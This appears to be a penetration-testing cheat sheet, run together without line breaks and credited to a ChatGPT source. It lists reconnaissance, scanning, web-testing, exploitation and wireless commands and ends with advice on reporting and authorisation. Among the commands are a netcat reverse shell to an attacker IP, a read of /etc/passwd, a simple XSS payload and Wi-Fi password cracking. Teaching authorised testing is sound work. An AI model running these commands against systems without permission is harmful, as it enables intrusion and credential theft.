PT Cheat Sheet
PT Cheat Sheet
xxxxxxxxxx# Comprehensive Penetration Testing Cheatsheet# -------------------------------------------------------------# 1. RECONNAISSANCE# -------------------------------------------------------------## Passive Information Gathering### Google Dorking:site:example.com filetype:pdfcache:example.comlink:example.com### Shodan:shodan search "apache"### TheHarvester (for email gathering):theharvester -d example.com -l 500 -b google## Active Information Gathering### DNS Enumeration with Dig:dig example.com ANY +noall +answer### Whois Lookup:whois example.com### Nmap for service discovery:nmap -sV -sT -sC example.com# -------------------------------------------------------------# 2. SCANNING & ENUMERATION# -------------------------------------------------------------## Nmap Basics:nmap example.com### Nmap aggressive scan:nmap -A example.com### Nikto for web server scanning:nikto -h http://example.com### SMB Enumeration:nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse example.com# -------------------------------------------------------------# 3. WEB APPLICATION TESTING# -------------------------------------------------------------## Dirb for directory discovery:dirb http://example.com## SQLMap for SQL injection:sqlmap -u "http://example.com/page?param=value"## XSS testing payload:<script>alert('XSS')</script>## Wfuzz for fuzzing:wfuzz -c -z file,wordlist.txt --hc 404 http://example.com/FUZZ# -------------------------------------------------------------# 4. EXPLOITATION# -------------------------------------------------------------## Metasploit Framework:msfconsolesearch [vulnerability]use [exploit path]set RHOSTS [target]set LHOST [your IP]exploit## Manual exploitation:### Using Netcat for a reverse shell:nc -e /bin/sh [your IP] [port]# -------------------------------------------------------------# 5. POST EXPLOITATION# -------------------------------------------------------------## Enumeration:### Check for other users:cat /etc/passwd### Check for sudo privileges:sudo -l### Searching for configuration files:find / -name *.conf### Downloading files:scp user@example.com:/path/to/file .# -------------------------------------------------------------# 6. WIRELESS TESTING# -------------------------------------------------------------### Aircrack-ng suite:## Capture packets:airodump-ng wlan0## Cracking Wi-Fi passwords:aircrack-ng -a2 -b [BSSID] -w [wordlist] [capture file]# -------------------------------------------------------------# 7. REPORTING# -------------------------------------------------------------## Key Components:- Executive Summary- Methodology- Detailed findings with risk rating- Technical details and reproduction steps- Impact assessment- Remediation recommendations- Appendices with raw data/logs# -------------------------------------------------------------# 8. ADDITIONAL TOOLS# -------------------------------------------------------------- Burp Suite (Web Application Analysis)- OWASP ZAP (Web Application Analysis)- Hydra (Password Cracking)- John the Ripper (Password Cracking)- Mimikatz (Windows Authentication)- Gobuster (Directory/File & DNS busting)# -------------------------------------------------------------# 9. RESOURCES & REFERENCES# -------------------------------------------------------------- OWASP Top Ten (Web Application Security Risks)- Exploit Database (Database of Public Exploits)- CVE Details (Database of Known Vulnerabilities)- Metasploit Unleashed (Free Metasploit Training)# -------------------------------------------------------------# 10. PROFESSIONAL CONDUCT# -------------------------------------------------------------- Always have explicit permission before testing.- Respect the client's boundaries and scope.- Ensure confidentiality and integrity of client data.- Report all findings transparently and constructively.Source: chat.openai.com
Twitter 
LinkedIn